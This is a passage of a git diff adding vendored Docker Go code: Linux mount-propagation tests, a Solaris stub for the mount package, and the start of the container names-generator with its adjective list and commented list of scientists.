+		outside2Path      = path.Join(outside2Dir, "file.txt")
+		outside1CheckPath = path.Join(targetDir, "a", "file.txt")
+		outside2CheckPath = path.Join(sourceDir, "b", "file.txt")
+	)
+	if err := os.MkdirAll(path.Join(sourceDir, "a"), 0777); err != nil {
+		t.Fatal(err)
+	}
+	if err := os.MkdirAll(path.Join(sourceDir, "b"), 0777); err != nil {
+		t.Fatal(err)
+	}
+	if err := os.Mkdir(targetDir, 0777); err != nil {
+		t.Fatal(err)
+	}
+	if err := os.Mkdir(outside1Dir, 0777); err != nil {
+		t.Fatal(err)
+	}
+	if err := os.Mkdir(outside2Dir, 0777); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := createFile(outside1Path); err != nil {
+		t.Fatal(err)
+	}
+	if err := createFile(outside2Path); err != nil {
+		t.Fatal(err)
+	}
+
+	// mount the shared directory to a target
+	if err := Mount(sourceDir, targetDir, "none", "bind,rw"); err != nil {
+		t.Fatal(err)
+	}
+	defer func() {
+		if err := Unmount(targetDir); err != nil {
+			t.Fatal(err)
+		}
+	}()
+
+	// next, make the target private
+	if err := MakePrivate(targetDir); err != nil {
+		t.Fatal(err)
+	}
+	defer func() {
+		if err := Unmount(targetDir); err != nil {
+			t.Fatal(err)
+		}
+	}()
+
+	// mount in an outside path to a mounted path inside the _source_
+	if err := Mount(outside1Dir, path.Join(sourceDir, "a"), "none", "bind,rw"); err != nil {
+		t.Fatal(err)
+	}
+	defer func() {
+		if err := Unmount(path.Join(sourceDir, "a")); err != nil {
+			t.Fatal(err)
+		}
+	}()
+
+	// check that this file _does_not_ show in the _target_
+	if _, err := os.Stat(outside1CheckPath); err != nil && !os.IsNotExist(err) {
+		t.Fatal(err)
+	} else if err == nil {
+		t.Fatalf("%q should not be visible, but is", outside1CheckPath)
+	}
+
+	// next mount outside2Dir into the _target_
+	if err := Mount(outside2Dir, path.Join(targetDir, "b"), "none", "bind,rw"); err != nil {
+		t.Fatal(err)
+	}
+	defer func() {
+		if err := Unmount(path.Join(targetDir, "b")); err != nil {
+			t.Fatal(err)
+		}
+	}()
+
+	// check that this file _does_not_ show in the _source_
+	if _, err := os.Stat(outside2CheckPath); err != nil && !os.IsNotExist(err) {
+		t.Fatal(err)
+	} else if err == nil {
+		t.Fatalf("%q should not be visible, but is", outside2CheckPath)
+	}
+}
+
+// Testing that when a target is a shared mount,
+// then child mounts propagate to the source
+func TestSubtreeShared(t *testing.T) {
+	tmp := path.Join(os.TempDir(), "mount-tests")
+	if err := os.MkdirAll(tmp, 0777); err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmp)
+
+	var (
+		sourceDir  = path.Join(tmp, "source")
+		targetDir  = path.Join(tmp, "target")
+		outsideDir = path.Join(tmp, "outside")
+
+		outsidePath     = path.Join(outsideDir, "file.txt")
+		sourceCheckPath = path.Join(sourceDir, "a", "file.txt")
+	)
+
+	if err := os.MkdirAll(path.Join(sourceDir, "a"), 0777); err != nil {
+		t.Fatal(err)
+	}
+	if err := os.Mkdir(targetDir, 0777); err != nil {
+		t.Fatal(err)
+	}
+	if err := os.Mkdir(outsideDir, 0777); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := createFile(outsidePath); err != nil {
+		t.Fatal(err)
+	}
+
+	// mount the source as shared
+	if err := MakeShared(sourceDir); err != nil {
+		t.Fatal(err)
+	}
+	defer func() {
+		if err := Unmount(sourceDir); err != nil {
+			t.Fatal(err)
+		}
+	}()
+
+	// mount the shared directory to a target
+	if err := Mount(sourceDir, targetDir, "none", "bind,rw"); err != nil {
+		t.Fatal(err)
+	}
+	defer func() {
+		if err := Unmount(targetDir); err != nil {
+			t.Fatal(err)
+		}
+	}()
+
+	// mount in an outside path to a mounted path inside the target
+	if err := Mount(outsideDir, path.Join(targetDir, "a"), "none", "bind,rw"); err != nil {
+		t.Fatal(err)
+	}
+	defer func() {
+		if err := Unmount(path.Join(targetDir, "a")); err != nil {
+			t.Fatal(err)
+		}
+	}()
+
+	// NOW, check that the file from the outside directory is available in the source directory
+	if _, err := os.Stat(sourceCheckPath); err != nil {
+		t.Fatal(err)
+	}
+}
+
+// testing that mounts to a shared source show up in the slave target,
+// and that mounts into a slave target do _not_ show up in the shared source
+func TestSubtreeSharedSlave(t *testing.T) {
+	tmp := path.Join(os.TempDir(), "mount-tests")
+	if err := os.MkdirAll(tmp, 0777); err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmp)
+
+	var (
+		sourceDir   = path.Join(tmp, "source")
+		targetDir   = path.Join(tmp, "target")
+		outside1Dir = path.Join(tmp, "outside1")
+		outside2Dir = path.Join(tmp, "outside2")
+
+		outside1Path      = path.Join(outside1Dir, "file.txt")
+		outside2Path      = path.Join(outside2Dir, "file.txt")
+		outside1CheckPath = path.Join(targetDir, "a", "file.txt")
+		outside2CheckPath = path.Join(sourceDir, "b", "file.txt")
+	)
+	if err := os.MkdirAll(path.Join(sourceDir, "a"), 0777); err != nil {
+		t.Fatal(err)
+	}
+	if err := os.MkdirAll(path.Join(sourceDir, "b"), 0777); err != nil {
+		t.Fatal(err)
+	}
+	if err := os.Mkdir(targetDir, 0777); err != nil {
+		t.Fatal(err)
+	}
+	if err := os.Mkdir(outside1Dir, 0777); err != nil {
+		t.Fatal(err)
+	}
+	if err := os.Mkdir(outside2Dir, 0777); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := createFile(outside1Path); err != nil {
+		t.Fatal(err)
+	}
+	if err := createFile(outside2Path); err != nil {
+		t.Fatal(err)
+	}
+
+	// mount the source as shared
+	if err := MakeShared(sourceDir); err != nil {
+		t.Fatal(err)
+	}
+	defer func() {
+		if err := Unmount(sourceDir); err != nil {
+			t.Fatal(err)
+		}
+	}()
+
+	// mount the shared directory to a target
+	if err := Mount(sourceDir, targetDir, "none", "bind,rw"); err != nil {
+		t.Fatal(err)
+	}
+	defer func() {
+		if err := Unmount(targetDir); err != nil {
+			t.Fatal(err)
+		}
+	}()
+
+	// next, make the target slave
+	if err := MakeSlave(targetDir); err != nil {
+		t.Fatal(err)
+	}
+	defer func() {
+		if err := Unmount(targetDir); err != nil {
+			t.Fatal(err)
+		}
+	}()
+
+	// mount in an outside path to a mounted path inside the _source_
+	if err := Mount(outside1Dir, path.Join(sourceDir, "a"), "none", "bind,rw"); err != nil {
+		t.Fatal(err)
+	}
+	defer func() {
+		if err := Unmount(path.Join(sourceDir, "a")); err != nil {
+			t.Fatal(err)
+		}
+	}()
+
+	// check that this file _does_ show in the _target_
+	if _, err := os.Stat(outside1CheckPath); err != nil {
+		t.Fatal(err)
+	}
+
+	// next mount outside2Dir into the _target_
+	if err := Mount(outside2Dir, path.Join(targetDir, "b"), "none", "bind,rw"); err != nil {
+		t.Fatal(err)
+	}
+	defer func() {
+		if err := Unmount(path.Join(targetDir, "b")); err != nil {
+			t.Fatal(err)
+		}
+	}()
+
+	// check that this file _does_not_ show in the _source_
+	if _, err := os.Stat(outside2CheckPath); err != nil && !os.IsNotExist(err) {
+		t.Fatal(err)
+	} else if err == nil {
+		t.Fatalf("%q should not be visible, but is", outside2CheckPath)
+	}
+}
+
+func TestSubtreeUnbindable(t *testing.T) {
+	tmp := path.Join(os.TempDir(), "mount-tests")
+	if err := os.MkdirAll(tmp, 0777); err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmp)
+
+	var (
+		sourceDir = path.Join(tmp, "source")
+		targetDir = path.Join(tmp, "target")
+	)
+	if err := os.MkdirAll(sourceDir, 0777); err != nil {
+		t.Fatal(err)
+	}
+	if err := os.MkdirAll(targetDir, 0777); err != nil {
+		t.Fatal(err)
+	}
+
+	// next, make the source unbindable
+	if err := MakeUnbindable(sourceDir); err != nil {
+		t.Fatal(err)
+	}
+	defer func() {
+		if err := Unmount(sourceDir); err != nil {
+			t.Fatal(err)
+		}
+	}()
+
+	// then attempt to mount it to target. It should fail
+	if err := Mount(sourceDir, targetDir, "none", "bind,rw"); err != nil && err != syscall.EINVAL {
+		t.Fatal(err)
+	} else if err == nil {
+		t.Fatalf("%q should not have been bindable", sourceDir)
+	}
+	defer func() {
+		if err := Unmount(targetDir); err != nil {
+			t.Fatal(err)
+		}
+	}()
+}
+
+func createFile(path string) error {
+	f, err := os.Create(path)
+	if err != nil {
+		return err
+	}
+	f.WriteString("hello world!")
+	return f.Close()
+}
diff --git a/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_solaris.go b/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_solaris.go
new file mode 100644
index 0000000000..09f6b03cbc
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_solaris.go
@@ -0,0 +1,58 @@
+// +build solaris
+
+package mount
+
+// MakeShared ensures a mounted filesystem has the SHARED mount option enabled.
+// See the supported options in flags.go for further reference.
+func MakeShared(mountPoint string) error {
+	return ensureMountedAs(mountPoint, "shared")
+}
+
+// MakeRShared ensures a mounted filesystem has the RSHARED mount option enabled.
+// See the supported options in flags.go for further reference.
+func MakeRShared(mountPoint string) error {
+	return ensureMountedAs(mountPoint, "rshared")
+}
+
+// MakePrivate ensures a mounted filesystem has the PRIVATE mount option enabled.
+// See the supported options in flags.go for further reference.
+func MakePrivate(mountPoint string) error {
+	return ensureMountedAs(mountPoint, "private")
+}
+
+// MakeRPrivate ensures a mounted filesystem has the RPRIVATE mount option
+// enabled. See the supported options in flags.go for further reference.
+func MakeRPrivate(mountPoint string) error {
+	return ensureMountedAs(mountPoint, "rprivate")
+}
+
+// MakeSlave ensures a mounted filesystem has the SLAVE mount option enabled.
+// See the supported options in flags.go for further reference.
+func MakeSlave(mountPoint string) error {
+	return ensureMountedAs(mountPoint, "slave")
+}
+
+// MakeRSlave ensures a mounted filesystem has the RSLAVE mount option enabled.
+// See the supported options in flags.go for further reference.
+func MakeRSlave(mountPoint string) error {
+	return ensureMountedAs(mountPoint, "rslave")
+}
+
+// MakeUnbindable ensures a mounted filesystem has the UNBINDABLE mount option
+// enabled. See the supported options in flags.go for further reference.
+func MakeUnbindable(mountPoint string) error {
+	return ensureMountedAs(mountPoint, "unbindable")
+}
+
+// MakeRUnbindable ensures a mounted filesystem has the RUNBINDABLE mount
+// option enabled. See the supported options in flags.go for further reference.
+func MakeRUnbindable(mountPoint string) error {
+	return ensureMountedAs(mountPoint, "runbindable")
+}
+
+func ensureMountedAs(mountPoint, options string) error {
+	// TODO: Solaris does not support bind mounts.
+	// Evaluate lofs and also look at the relevant
+	// mount flags to be supported.
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/namesgenerator/cmd/names-generator/main.go b/vendor/github.com/docker/docker/pkg/namesgenerator/cmd/names-generator/main.go
new file mode 100644
index 0000000000..18a939b70b
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/namesgenerator/cmd/names-generator/main.go
@@ -0,0 +1,11 @@
+package main
+
+import (
+	"fmt"
+
+	"github.com/docker/docker/pkg/namesgenerator"
+)
+
+func main() {
+	fmt.Println(namesgenerator.GetRandomName(0))
+}
diff --git a/vendor/github.com/docker/docker/pkg/namesgenerator/names-generator.go b/vendor/github.com/docker/docker/pkg/namesgenerator/names-generator.go
new file mode 100644
index 0000000000..cfb8157d69
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/namesgenerator/names-generator.go
@@ -0,0 +1,590 @@
+package namesgenerator
+
+import (
+	"fmt"
+
+	"github.com/docker/docker/pkg/random"
+)
+
+var (
+	left = [...]string{
+		"admiring",
+		"adoring",
+		"affectionate",
+		"agitated",
+		"amazing",
+		"angry",
+		"awesome",
+		"blissful",
+		"boring",
+		"brave",
+		"clever",
+		"cocky",
+		"compassionate",
+		"competent",
+		"condescending",
+		"confident",
+		"cranky",
+		"dazzling",
+		"determined",
+		"distracted",
+		"dreamy",
+		"eager",
+		"ecstatic",
+		"elastic",
+		"elated",
+		"elegant",
+		"eloquent",
+		"epic",
+		"fervent",
+		"festive",
+		"flamboyant",
+		"focused",
+		"friendly",
+		"frosty",
+		"gallant",
+		"gifted",
+		"goofy",
+		"gracious",
+		"happy",
+		"hardcore",
+		"heuristic",
+		"hopeful",
+		"hungry",
+		"infallible",
+		"inspiring",
+		"jolly",
+		"jovial",
+		"keen",
+		"kickass",
+		"kind",
+		"laughing",
+		"loving",
+		"lucid",
+		"mystifying",
+		"modest",
+		"musing",
+		"naughty",
+		"nervous",
+		"nifty",
+		"nostalgic",
+		"objective",
+		"optimistic",
+		"peaceful",
+		"pedantic",
+		"pensive",
+		"practical",
+		"priceless",
+		"quirky",
+		"quizzical",
+		"relaxed",
+		"reverent",
+		"romantic",
+		"sad",
+		"serene",
+		"sharp",
+		"silly",
+		"sleepy",
+		"stoic",
+		"stupefied",
+		"suspicious",
+		"tender",
+		"thirsty",
+		"trusting",
+		"unruffled",
+		"upbeat",
+		"vibrant",
+		"vigilant",
+		"wizardly",
+		"wonderful",
+		"xenodochial",
+		"youthful",
+		"zealous",
+		"zen",
+	}
+
+	// Docker, starting from 0.7.x, generates names from notable scientists and hackers.
+	// Please, for any amazing man that you add to the list, consider adding an equally amazing woman to it, and vice versa.
+	right = [...]string{
+		// Muhammad ibn Jābir al-Ḥarrānī al-Battānī was a founding father of astronomy. https://en.wikipedia.org/wiki/Mu%E1%B8%A5ammad_ibn_J%C4%81bir_al-%E1%B8%A4arr%C4%81n%C4%AB_al-Batt%C4%81n%C4%AB
+		"albattani",
+
+		// Frances E. Allen, became the first female IBM Fellow in 1989. In 2006, she became the first female recipient of the ACM's Turing Award. https://en.wikipedia.org/wiki/Frances_E._Allen
+		"allen",
+
+		// June Almeida - Scottish virologist who took the first pictures of the rubella virus - https://en.wikipedia.org/wiki/June_Almeida
+		"almeida",
+
+		// Maria Gaetana Agnesi - Italian mathematician, philosopher, theologian and humanitarian. She was the first woman to write a mathematics handbook and the first woman appointed as a Mathematics Professor at a University. https://en.wikipedia.org/wiki/Maria_Gaetana_Agnesi
+		"agnesi",
+
+		// Archimedes was a physicist, engineer and mathematician who invented too many things to list them here. https://en.wikipedia.org/wiki/Archimedes
+		"archimedes",
+
+		// Maria Ardinghelli - Italian translator, mathematician and physicist - https://en.wikipedia.org/wiki/Maria_Ardinghelli
+		"ardinghelli",
+
+		// Aryabhata - Ancient Indian mathematician-astronomer during 476-550 CE https://en.wikipedia.org/wiki/Aryabhata
+		"aryabhata",
+
+		// Wanda Austin - Wanda Austin is the President and CEO of The Aerospace Corporation, a leading architect for the US security space programs. https://en.wikipedia.org/wiki/Wanda_Austin
+		"austin",
+
+		// Charles Babbage invented the concept of a programmable computer. https://en.wikipedia.org/wiki/Charles_Babbage.
+		"babbage",
+
+		// Stefan Banach - Polish mathematician, was one of the founders of modern functional analysis. https://en.wikipedia.org/wiki/Stefan_Banach
+		"banach",
+
+		// John Bardeen co-invented the transistor - https://en.wikipedia.org/wiki/John_Bardeen
+		"bardeen",
+
+		// Jean Bartik, born Betty Jean Jennings, was one of the original programmers for the ENIAC computer. https://en.wikipedia.org/wiki/Jean_Bartik
+		"bartik",
+
+		// Laura Bassi, the world's first female professor https://en.wikipedia.org/wiki/Laura_Bassi
+		"bassi",
+
+		// Hugh Beaver, British engineer, founder of the Guinness Book of World Records https://en.wikipedia.org/wiki/Hugh_Beaver
+		"beaver",
+
+		// Alexander Graham Bell - an eminent Scottish-born scientist, inventor, engineer and innovator who is credited with inventing the first practical telephone - https://en.wikipedia.org/wiki/Alexander_Graham_Bell
+		"bell",
+
+		// Homi J Bhabha - was an Indian nuclear physicist, founding director, and professor of physics at the Tata Institute of Fundamental Research. Colloquially known as "father of Indian nuclear programme"- https://en.wikipedia.org/wiki/Homi_J._Bhabha
+		"bhabha",
+
+		// Bhaskara II - Ancient Indian mathematician-astronomer whose work on calculus predates Newton and Leibniz by over half a millennium - https://en.wikipedia.org/wiki/Bh%C4%81skara_II#Calculus
+		"bhaskara",
+
+		// Elizabeth Blackwell - American doctor and first American woman to receive a medical degree - https://en.wikipedia.org/wiki/Elizabeth_Blackwell
+		"blackwell",
+
+		// Niels Bohr is the father of quantum theory. https://en.wikipedia.org/wiki/Niels_Bohr.
+		"bohr",
+
+		// Kathleen Booth, she's credited with writing the first assembly language. https://en.wikipedia.org/wiki/Kathleen_Booth
+		"booth",
+
+		// Anita Borg - Anita Borg was the founding director of the Institute for Women and Technology (IWT). https://en.wikipedia.org/wiki/Anita_Borg
+		"borg",
+
+		// Satyendra Nath Bose - He provided the foundation for Bose–Einstein statistics and the theory of the Bose–Einstein condensate. - https://en.wikipedia.org/wiki/Satyendra_Nath_Bose
+		"bose",
+
+		// Evelyn Boyd Granville - She was one of the first African-American woman to receive a Ph.D. in mathematics; she earned it in 1949 from Yale University. https://en.wikipedia.org/wiki/Evelyn_Boyd_Granville
+		"boyd",
+
+		// Brahmagupta - Ancient Indian mathematician during 598-670 CE who gave rules to compute with zero - https://en.wikipedia.org/wiki/Brahmagupta#Zero
+		"brahmagupta",
+
+		// Walter Houser Brattain co-invented the transistor - https://en.wikipedia.org/wiki/Walter_Houser_Brattain
+		"brattain",
+
+		// Emmett Brown invented time travel. https://en.wikipedia.org/wiki/Emmett_Brown (thanks Brian Goff)
+		"brown",
+
+		// Rachel Carson - American marine biologist and conservationist, her book Silent Spring and other writings are credited with advancing the global environmental movement. https://en.wikipedia.org/wiki/Rachel_Carson
+		"carson",
+
+		// Subrahmanyan Chandrasekhar - Astrophysicist known for his mathematical theory on different stages and evolution in structures of the stars. He has won nobel prize for physics - https://en.wikipedia.org/wiki/Subrahmanyan_Chandrasekhar
+		"chandrasekhar",
+
+		//Claude Shannon - The father of information theory and founder of digital circuit design theory. (https://en.wikipedia.org/wiki/Claude_Shannon)
+		"shannon",
+
+		// Joan Clarke - Bletchley Park code breaker during the Second World War who pioneered techniques that remained top secret for decades. Also an accomplished numismatist https://en.wikipedia.org/wiki/Joan_Clarke
+		"clarke",
+
+		// Jane Colden - American botanist widely considered the first female American botanist - https://en.wikipedia.org/wiki/Jane_Colden
+		"colden",
+
+		// Gerty Theresa Cori - American biochemist who became the third woman—and first American woman—to win a Nobel Prize in science, and the first woman to be awarded the Nobel Prize in Physiology or Medicine. Cori was born in Prague. https://en.wikipedia.org/wiki/Gerty_Cori
+		"cori",
+
+		// Seymour Roger Cray was an American electrical engineer and supercomputer architect who designed a series of computers that were the fastest in the world for decades. https://en.wikipedia.org/wiki/Seymour_Cray
+		"cray",
+
+		// This entry reflects a husband and wife team who worked together:
+		// Joan Curran was a Welsh scientist who developed radar and invented chaff, a radar countermeasure. https://en.wikipedia.org/wiki/Joan_Curran
+		// Samuel Curran was an Irish physicist who worked alongside his wife during WWII and invented the proximity fuse. https://en.wikipedia.org/wiki/Samuel_Curran
+		"curran",
+
+		// Marie Curie discovered radioactivity. https://en.wikipedia.org/wiki/Marie_Curie.
+		"curie",
+
+		// Charles Darwin established the principles of natural evolution. https://en.wikipedia.org/wiki/Charles_Darwin.
+		"darwin",
+
+		// Leonardo Da Vinci invented too many things to list here. https://en.wikipedia.org/wiki/Leonardo_da_Vinci.
+		"davinci",
+
+		// Edsger Wybe Dijkstra was a Dutch computer scientist and mathematical scientist. https://en.wikipedia.org/wiki/Edsger_W._Dijkstra.
+		"dijkstra",
+
+		// Donna Dubinsky - played an integral role in the development of personal digital assistants (PDAs) serving as CEO of Palm, Inc. and co-founding Handspring. https://en.wikipedia.org/wiki/Donna_Dubinsky
+		"dubinsky",
+
+		// Annie Easley - She was a leading member of the team which developed software for the Centaur rocket stage and one of the first African-Americans in her field. https://en.wikipedia.org/wiki/Annie_Easley
+		"easley",
+
+		// Thomas Alva Edison, prolific inventor https://en.wikipedia.org/wiki/Thomas_Edison
+		"edison",
+
+		// Albert Einstein invented the general theory of relativity. https://en.wikipedia.org/wiki/Albert_Einstein
+		"einstein",
+
+		// Gertrude Elion - American biochemist, pharmacologist and the 1988 recipient of the Nobel Prize in Medicine - https://en.wikipedia.org/wiki/Gertrude_Elion
+		"elion",
+
+		// Douglas Engelbart gave the mother of all demos: https://en.wikipedia.org/wiki/Douglas_Engelbart
+		"engelbart",
+
+		// Euclid invented geometry. https://en.wikipedia.org/wiki/Euclid
+		"euclid",
+
+		// Leonhard Euler invented large parts of modern mathematics. https://de.wikipedia.org/wiki/Leonhard_Euler
+		"euler",
+
+		// Pierre de Fermat pioneered several aspects of modern mathematics. https://en.wikipedia.org/wiki/Pierre_de_Fermat
+		"fermat",
+
+		// Enrico Fermi invented the first nuclear reactor. https://en.wikipedia.org/wiki/Enrico_Fermi.
+		"fermi",
+
+		// Richard Feynman was a key contributor to quantum mechanics and particle physics. https://en.wikipedia.org/wiki/Richard_Feynman
+		"feynman",
+
+		// Benjamin Franklin is famous for his experiments in electricity and the invention of the lightning rod.
+		"franklin",
+
+		// Galileo was a founding father of modern astronomy, and faced politics and obscurantism to establish scientific truth.  https://en.wikipedia.org/wiki/Galileo_Galilei
+		"galileo",
+
+		// William Henry "Bill" Gates III is an American business magnate, philanthropist, investor, computer programmer, and inventor. https://en.wikipedia.org/wiki/Bill_Gates
+		"gates",
+
+		// Adele Goldberg, was one of the designers and developers of the Smalltalk language. https://en.wikipedia.org/wiki/Adele_Goldberg_(computer_scientist)
+		"goldberg",
+
+		// Adele Goldstine, born Adele Katz, wrote the complete technical description for the first electronic digital computer, ENIAC. https://en.wikipedia.org/wiki/Adele_Goldstine
+		"goldstine",
+
+		// Shafi Goldwasser is a computer scientist known for creating theoretical foundations of modern cryptography. Winner of 2012 ACM Turing Award. https://en.wikipedia.org/wiki/Shafi_Goldwasser
+		"goldwasser",
+
+		// James Golick, all around gangster.
+		"golick",
+
+		// Jane Goodall - British primatologist, ethologist, and anthropologist who is considered to be the world's foremost expert on chimpanzees - https://en.wikipedia.org/wiki/Jane_Goodall
+		"goodall",
+
+		// Lois Haibt - American computer scientist, part of the team at IBM that developed FORTRAN - https://en.wikipedia.org/wiki/Lois_Haibt
+		"haibt",
+
+		// Margaret Hamilton - Director of the Software Engineering Division of the MIT Instrumentation Laboratory, which developed on-board flight software for the Apollo space program. https://en.wikipedia.org/wiki/Margaret_Hamilton_(scientist)
+		"hamilton",
+
+		// Stephen Hawking pioneered the field of cosmology by combining general relativity and quantum mechanics. https://en.wikipedia.org/wiki/Stephen_Hawking
+		"hawking",
+
+		// Werner Heisenberg was a founding father of quantum mechanics. https://en.wikipedia.org/wiki/Werner_Heisenberg
+		"heisenberg",
+
+		// Jaroslav Heyrovský was the inventor of the polarographic method, father of the electroanalytical method, and recipient of the Nobel Prize in 1959. His main field of work was polarography. https://en.wikipedia.org/wiki/Jaroslav_Heyrovsk%C3%BD
+		"heyrovsky",
+
+		// Dorothy Hodgkin was a British biochemist, credited with the development of protein crystallography. She was awarded the Nobel Prize in Chemistry in 1964. https://en.wikipedia.org/wiki/Dorothy_Hodgkin
+		"hodgkin",
+
+		// Erna Schneider Hoover revolutionized modern communication by inventing a computerized telephone switching method. https://en.wikipedia.org/wiki/Erna_Schneider_Hoover
+		"hoover",
+
+		// Grace Hopper developed the first compiler for a computer programming language and  is credited with popularizing the term "debugging" for fixing computer glitches. https://en.wikipedia.org/wiki/Grace_Hopper
+		"hopper",
+
+		// Frances Hugle, she was an American scientist, engineer, and inventor who contributed to the understanding of semiconductors, integrated circuitry, and the unique electrical principles of microscopic materials. https://en.wikipedia.org/wiki/Frances_Hugle
+		"hugle",
+
+		// Hypatia - Greek Alexandrine Neoplatonist philosopher in Egypt who was one of the earliest mothers of mathematics - https://en.wikipedia.org/wiki/Hypatia
+		"hypatia",
+
+		// Yeong-Sil Jang was a Korean scientist and astronomer during the Joseon Dynasty; he invented the first metal printing press and water gauge. https://en.wikipedia.org/wiki/Jang_Yeong-sil
+		"jang",
+
+		// Betty Jennings - one of the original programmers of the ENIAC. https://en.wikipedia.org/wiki/ENIAC - https://en.wikipedia.org/wiki/Jean_Bartik
+		"jennings",
+
+		// Mary Lou Jepsen, was the founder and chief technology officer of One Laptop Per Child (OLPC), and the founder of Pixel Qi. https://en.wikipedia.org/wiki/Mary_Lou_Jepsen
+		"jepsen",
+
+		// Irène Joliot-Curie - French scientist who was awarded the Nobel Prize for Chemistry in 1935. Daughter of Marie and Pierre Curie. https://en.wikipedia.org/wiki/Ir%C3%A8ne_Joliot-Curie
+		"joliot",
+
+		// Karen Spärck Jones came up with the concept of inverse document frequency, which is used in most search engines today. https://en.wikipedia.org/wiki/Karen_Sp%C3%A4rck_Jones
+		"jones",
+
+		// A. P. J. Abdul Kalam - is an Indian scientist aka Missile Man of India for his work on the development of ballistic missile and launch vehicle technology - https://en.wikipedia.org/wiki/A._P._J._Abdul_Kalam
+		"kalam",
+
+		// Susan Kare, created the icons and many of the interface elements for the original Apple Macintosh in the 1980s, and was an original employee of NeXT, working as the Creative Director. https://en.wikipedia.org/wiki/Susan_Kare
+		"kare",
+
+		// Mary Kenneth Keller, Sister Mary Kenneth Keller became the first American woman to earn a PhD in Computer Science in 1965. https://en.wikipedia.org/wiki/Mary_Kenneth_Keller
+		"keller",
+
+		// Har Gobind Khorana - Indian-American biochemist who shared the 1968 Nobel Prize for Physiology - https://en.wikipedia.org/wiki/Har_Gobind_Khorana
+		"khorana",
+
+		// Jack Kilby invented silicone integrated circuits and gave Silicon Valley its name. - https://en.wikipedia.org/wiki/Jack_Kilby
+		"kilby",
+
+		// Maria Kirch - German astronomer and first woman to discover a comet - https://en.wikipedia.org/wiki/Maria_Margarethe_Kirch
+		"kirch",
+
+		// Donald Knuth - American computer scientist, author of "The Art of Computer Programming" and creator of the TeX typesetting system. https://en.wikipedia.org/wiki/Donald_Knuth
+		"knuth",
+
+		// Sophie Kowalevski - Russian mathematician responsible for important original contributions to analysis, differential equations and mechanics - https://en.wikipedia.org/wiki/Sofia_Kovalevskaya
+		"kowalevski",
+
+		// Marie-Jeanne de Lalande - French astronomer, mathematician and cataloguer of stars - https://en.wikipedia.org/wiki/Marie-Jeanne_de_Lalande
+		"lalande",
+
+		// Hedy Lamarr - Actress and inventor. The principles of her work are now incorporated into modern Wi-Fi, CDMA and Bluetooth technology. https://en.wikipedia.org/wiki/Hedy_Lamarr
+		"lamarr",
+
+		// Leslie B. Lamport - American computer scientist. Lamport is best known for his seminal work in distributed systems and was the winner of the 2013 Turing Award. https://en.wikipedia.org/wiki/Leslie_Lamport
+		"lamport",
+
+		// Mary Leakey - British paleoanthropologist who discovered the first fossilized Proconsul skull - https://en.wikipedia.org/wiki/Mary_Leakey
+		"leakey",
+
+		// Henrietta Swan Leavitt - she was an American astronomer who discovered the relation between the luminosity and the period of Cepheid variable stars. https://en.wikipedia.org/wiki/Henrietta_Swan_Leavitt
+		"leavitt",
+
+		//Daniel Lewin -  Mathematician, Akamai co-founder, soldier, 9/11 victim-- Developed optimization techniques for routing traffic on the internet. Died attempting to stop the 9-11 hijackers. https://en.wikipedia.org/wiki/Daniel_Lewin
+		"lewin",
+
+		// Ruth Lichterman - one of the original programmers of the ENIAC. https://en.wikipedia.org/wiki/ENIAC - https://en.wikipedia.org/wiki/Ruth_Teitelbaum
+		"lichterman",
+
+		// Barbara Liskov - co-developed the Liskov substitution principle. Liskov was also the winner of the Turing Prize in 2008. - https://en.wikipedia.org/wiki/Barbara_Liskov
+		"liskov",
+
+		// Ada Lovelace invented the first algorithm. https://en.wikipedia.org/wiki/Ada_Lovelace (thanks James Turnbull)
+		"lovelace",
+
+		// Auguste and Louis Lumière - the first filmmakers in history - https://en.wikipedia.org/wiki/Auguste_and_Louis_Lumi%C3%A8re
+		"lumiere",
+
+		// Mahavira - Ancient Indian mathematician during 9th century AD who discovered basic algebraic identities - https://en.wikipedia.org/wiki/Mah%C4%81v%C4%ABra_(mathematician)
+		"mahavira",
+
+		// Maria Mayer - American theoretical physicist and Nobel laureate in Physics for proposing the nuclear shell model of the atomic nucleus - https://en.wikipedia.org/wiki/Maria_Mayer
+		"mayer",
+
+		// John McCarthy invented LISP: https://en.wikipedia.org/wiki/John_McCarthy_(computer_scientist)
+		"mccarthy",
+
+		// Barbara McClintock - a distinguished American cytogeneticist, 1983 Nobel Laureate in Physiology or Medicine for discovering transposons. https://en.wikipedia.org/wiki/Barbara_McClintock
+		"mcclintock",
+
+		// Malcolm McLean invented the modern shipping container: https://en.wikipedia.org/wiki/Malcom_McLean
+		"mclean",
+
+		// Kay McNulty - one of the original programmers of the ENIAC. https://en.wikipedia.org/wiki/ENIAC - https://en.wikipedia.org/wiki/Kathleen_Antonelli
+		"mcnulty",
+
+		// Lise Meitner - Austrian/Swedish physicist who was involved in the discovery of nuclear fission. The element meitnerium is named after her - https://en.wikipedia.org/wiki/Lise_Meitner
+		"meitner",
+
+		// Carla Meninsky, was the game designer and programmer for Atari 2600 games Dodge 'Em and Warlords. https://en.wikipedia.org/wiki/Carla_Meninsky
+		"meninsky",
+
+		// Johanna Mestorf - German prehistoric archaeologist and first female museum director in Germany - https://en.wikipedia.org/wiki/Johanna_Mestorf
+		"mestorf",
+
+		// Marvin Minsky - Pioneer in Artificial Intelligence, co-founder of the MIT's AI Lab, won the Turing Award in 1969. https://en.wikipedia.org/wiki/Marvin_Minsky
+		"minsky",
+
+		// Maryam Mirzakhani - an Iranian mathematician and the first woman to win the Fields Medal. https://en.wikipedia.org/wiki/Maryam_Mirzakhani
+		"mirzakhani",
+
+		// Samuel Morse - contributed to the invention of a single-wire telegraph system based on European telegraphs and was a co-developer of the Morse code - https://en.wikipedia.org/wiki/Samuel_Morse
+		"morse",
+
+		// Ian Murdock - founder of the Debian project - https://en.wikipedia.org/wiki/Ian_Murdock
+		"murdock",
+
+		// Isaac Newton invented classic mechanics and modern optics. https://en.wikipedia.org/wiki/Isaac_Newton
+		"newton",
+
